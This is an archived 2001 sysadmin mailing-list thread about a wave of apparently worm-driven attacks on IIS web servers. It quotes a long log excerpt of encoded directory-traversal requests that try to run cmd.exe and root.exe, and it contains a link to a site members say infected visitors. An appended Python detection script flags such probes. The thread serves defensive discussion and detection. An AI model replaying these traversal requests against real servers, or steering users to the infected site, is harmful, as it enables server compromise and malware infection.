Title: RE: WARNING: Hacker Alert

I am not sure. I usually wasn't in that partition. I have been running XP for quite a while now and generally stay there. I had not been taking care of my W2K OS. The more I think about it, I think that I caused the problem. I was at work and when the site started hitting my hard drive I reached over and killed the power on my box for fear of sending mass emails, etc. I may have corrupted a system file when I did that. I have not heard of any other reports similar to mine.

-----Original Message-----
From: higginspi [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 19, 2001 2:09 PM
To: NT System Admin Issues
Subject: RE: WARNING: Hacker Alert


Shannon -- What version and SP did you have of
Internet Explorer?

Higgins

-----Original Message-----
From: Shannon Speck [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 19, 2001 2:38 PM
To: NT System Admin Issues
Subject: RE: WARNING: Hacker Alert


I, like a dumbass, went to this site and it fried some
windows files and my pc wouldn't boot after that.
Luckily I dual boot two NTFS partitions so I was able
to come back up under XP and get all my data back.
Still had to reformat the W2k partition. Re-install
didn't work. Oh well, live and learn.

-----Original Message-----
From: David B. Lunn [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 19, 2001 12:34 AM
To: NT System Admin Issues
Subject: RE: WARNING: Hacker Alert



Why would you put a link to an infected site?  If someone does not have sept 18th patterns????  They will immediately be infected???

-----Original Message-----
From: Martin Blackstone [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 8:19 AM
To: NT System Admin Issues
Subject: RE: WARNING: Hacker Alert



Here is a site that has been hit
http://216.39.178.32

-----Original Message-----
From: Jason Morris [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 7:59 AM
To: NT System Admin Issues
Subject: RE: WARNING: Hacker Alert



CodeRed seems to have dwindled to nothing on my logs. But it's being replaced with the EXACT same lines you have below, and they stay consistent with the code red 2 methods of attacking the more local subnets.

Jason Morris CCDA CCNP
Network Administrator
MJMC, Inc.
708-225-2350
[EMAIL PROTECTED]



-----Original Message-----
From: Jason Morris [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 9:50 AM
To: NT System Admin Issues
Cc: '[EMAIL PROTECTED]'
Subject: RE: WARNING: Hacker Alert



Yes. It seems to be systems I have previously monitored hitting me with codered attacks. I bet someone is activating all of their children.

Jason Morris CCDA CCNP
Network Administrator
MJMC, Inc.
708-225-2350
[EMAIL PROTECTED]



-----Original Message-----
From: xylog [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 9:45 AM
To: NT System Admin Issues
Subject: WARNING: Hacker Alert



All my public facing web servers at home and at my office have shown a huge continuous hacking activity. Has anyone seen similar? I fear this may be code red related or automated. Please comment if you have seen similar. Here is an excerpt from one logfile:

63.101.9.107, -, 9/18/01, 10:36:21, W3SVC4, DC1DIIS01, x.x.x.x, 0, 145, 0, 500, 87, GET, /msadc/..%5c../..%5c../..%5c/..�../..�../..�../winnt/system32/cmd.exe, /c+dir,
63.101.9.107, -, 9/18/01, 10:36:28, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET, /scripts/..�../winnt/system32/cmd.exe, /c+dir,
63.101.9.107, -, 9/18/01, 10:36:28, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET, /scripts/winnt/system32/cmd.exe, /c+dir,
63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir,
63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir,
63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 98, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 100, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.101.9.107, -, 9/18/01, 10:36:33, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%2f../winnt/system32/cmd.exe, /c+dir,
64.156.252.27, -, 9/18/01, 10:36:42, W3SVC4, DC1DIIS01, x.x.x.x, 156, 41, 13975, 200, 0, GET, /mpf-flow/flow/login.cfm, -,
63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 0, 72, 604, 404, 3, GET, /scripts/root.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 0, 70, 604, 404, 3, GET, /MSADC/root.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 0, 80, 604, 404, 3, GET, /c/winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 15, 80, 604, 404, 3, GET, /d/winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:06, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117, 0, 500, 87, GET, /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117, 0, 500, 87, GET, /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 0, 145, 0, 500, 87, GET, /msadc/..%5c../..%5c../..%5c/..�../..�../..�../winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 15, 97, 604, 404, 3, GET, /scripts/..�../winnt/system32/cmd.exe, /c+dir,
64.156.252.27, -, 9/18/01, 10:37:12, W3SVC4, DC1DIIS01, x.x.x.x, 156, 41, 13975, 200, 0, GET, /mpf-flow/flow/login.cfm, -,
63.101.171.231, -, 9/18/01, 10:37:12, W3SVC4, DC1DIIS01, x.x.x.x, 16, 97, 604, 404, 3, GET, /scripts/winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:12, W3SVC4, DC1DIIS01, x.x.x.x, 16, 97, 604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:13, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:13, W3SVC4, DC1DIIS01, x.x.x.x, 0, 98, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:13, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:13, W3SVC4, DC1DIIS01, x.x.x.x, 0, 100, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:17, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%2f../winnt/system32/cmd.exe, /c+dir,
63.230.208.17, -, 9/18/01, 10:37:21, W3SVC4, DC1DIIS01, x.x.x.x, 0, 72, 604, 404, 3, GET, /scripts/root.exe, /c+dir,
63.230.208.17, -, 9/18/01, 10:37:22, W3SVC4, DC1DIIS01, x.x.x.x, 0, 70, 604, 404, 3, GET, /MSADC/root.exe, /c+dir,
63.230.208.17, -, 9/18/01, 10:37:24, W3SVC4, DC1DIIS01, x.x.x.x, 0, 80, 604, 404, 3, GET, /c/winnt/system32/cmd.exe, /c+dir,
63.230.208.17, -, 9/18/01, 10:37:26, W3SVC4, DC1DIIS01, x.x.x.x, 0, 80, 604, 404, 3, GET, /d/winnt/system32/cmd.exe, /c+dir,
63.230.208.17, -, 9/18/01, 10:37:28, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.230.208.17, -, 9/18/01, 10:37:34, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117, 0, 500, 87, GET, /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
63.230.208.17, -, 9/18/01, 10:37:36, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117, 0, 500, 87, GET, /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
63.230.208.17, -, 9/18/01, 10:37:42, W3SVC4, DC1DIIS01, x.x.x.x, 0, 145, 0, 500, 87, GET, /msadc/..%5c../..%5c../..%5c/..�../..�../..�../winnt/system32/cmd.exe, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:37, W3SVC4, DC1DIIS01, x.x.x.x, 0, 72, 604, 404, 3, GET, /scripts/root.exe, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:37, W3SVC4, DC1DIIS01, x.x.x.x, 0, 70, 604, 404, 3, GET, /MSADC/root.exe, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:37, W3SVC4, DC1DIIS01, x.x.x.x, 0, 80, 604, 404, 3, GET, /c/winnt/system32/cmd.exe, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:38, W3SVC4, DC1DIIS01, x.x.x.x, 0, 80, 604, 404, 3, GET, /d/winnt/system32/cmd.exe, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:38, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:38, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117, 0, 500, 87, GET, /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:39, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117, 0, 500, 87, GET, /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:39, W3SVC4, DC1DIIS01, x.x.x.x, 0, 145, 0, 500, 87, GET, /msadc/..%5c../..%5c../..%5c/..�../..�../..�../winnt/system32/cmd.exe, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:39, W3SVC4, DC1DIIS01, x.x.x.x, 15, 97, 604, 404, 3, GET, /scripts/..�../winnt/system32/cmd.exe, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:41, W3SVC4, DC1DIIS01, x.x.x.x, 16, 97, 604, 404, 3, GET, /scripts/winnt/system32/cmd.exe, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:44, W3SVC4, DC1DIIS01, x.x.x.x, 15, 97, 604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:44, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:44, W3SVC4, DC1DIIS01, x.x.x.x, 0, 98, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
64.156.252.27, -, 9/18/01, 10:39:45, W3SVC4, DC1DIIS01, x.x.x.x, 172, 41, 13973, 200, 0, GET, /mpf-flow/flow/login.cfm, -,
63.114.34.130, -, 9/18/01, 10:39:45, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:45, W3SVC4, DC1DIIS01, x.x.x.x, 0, 100, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:47, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%2f../winnt/system32/cmd.exe, /c+dir,
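
A detection pass over logs in the layout of the excerpt in this thread, as an added example that is not part of the original messages: it rebuilds the 15-field records from a wrapped, run-together paste, flags requests for cmd.exe or root.exe and encoded directory traversal, and reports per client any probe the server answered with 200. The sample records, documentation IP addresses, host name WEB01 and all function names are constructed for illustration; the 200-status probe in the sample does not occur in the excerpt.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Field order of the 15-field IIS log file format seen in the excerpt.
FIELDS = ("client_ip", "user", "date", "time", "service", "server", "server_ip",
          "time_taken", "bytes_in", "bytes_out", "status", "win32_status",
          "method", "target", "params")

# Constructed sample (documentation IPs, hypothetical host WEB01), run together
# and wrapped mid-record the way a log pasted into e-mail ends up.
SAMPLE = """192.0.2.10, -, 9/18/01, 10:36:21, W3SVC4, WEB01, x.x.x.x, 0, 98, 0, 500,
87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 192.0.2.10, -,
9/18/01, 10:36:22, W3SVC4, WEB01, x.x.x.x, 0, 72, 604, 404, 3, GET,
/scripts/root.exe, /c+dir, 192.0.2.10, -, 9/18/01, 10:36:23, W3SVC4, WEB01,
x.x.x.x, 15, 96, 812, 200, 0, GET, /scripts/..%2f../winnt/system32/cmd.exe,
/c+dir, 198.51.100.7, -, 9/18/01, 10:36:42, W3SVC4, WEB01, x.x.x.x, 156, 41,
13975, 200, 0, GET, /app/login.cfm, -,"""

SHELL_TARGET = re.compile(r"/(?:cmd|root)\.exe$", re.I)

def parse_records(text):
    """Rebuild 15-field records, ignoring wraps (assumes no comma inside a field)."""
    tokens = [t.strip() for t in text.replace("\n", " ").split(",")]
    if tokens and tokens[-1] == "":
        tokens.pop()                      # trailing comma after the last record
    return [dict(zip(FIELDS, tokens[i:i + 15]))
            for i in range(0, len(tokens) - 14, 15)]

def normalize(target):
    """Percent-decode a few rounds and unify separators before matching."""
    for _ in range(3):
        target = unquote(target)
    return target.replace("\\", "/")

def is_probe(rec):
    path = normalize(rec["target"])
    return bool(SHELL_TARGET.search(path)) or "../" in path

def summarize(text):
    """Per client IP: probe count, plus probe targets the server answered with 200."""
    report = defaultdict(lambda: {"probes": 0, "answered_200": []})
    for rec in parse_records(text):
        if is_probe(rec):
            entry = report[rec["client_ip"]]
            entry["probes"] += 1
            if rec["status"] == "200":
                entry["answered_200"].append(rec["target"])
    return dict(report)
```

A non-empty `answered_200` list is the result to triage first: 404 and 500 responses mean the probe was rejected, while a 200 on one of these targets means the server served the request.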




http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

Confidential:  This e-mail and any files transmitted
with it are the
property of Lanco International and/or its affiliates,
are confidential,
and are intended solely for the use of the individual
or entity to whom
this e-mail is addressed. If you are not one of the
named recipient(s)
or otherwise have reason to believe that you have
received this message
in error, please notify the sender at the above e-mail
address and
delete this message immediately from your computer.
Any other use,
retention, dissemination, forwarding, printing or
copying of this e-mail
is strictly prohibited.
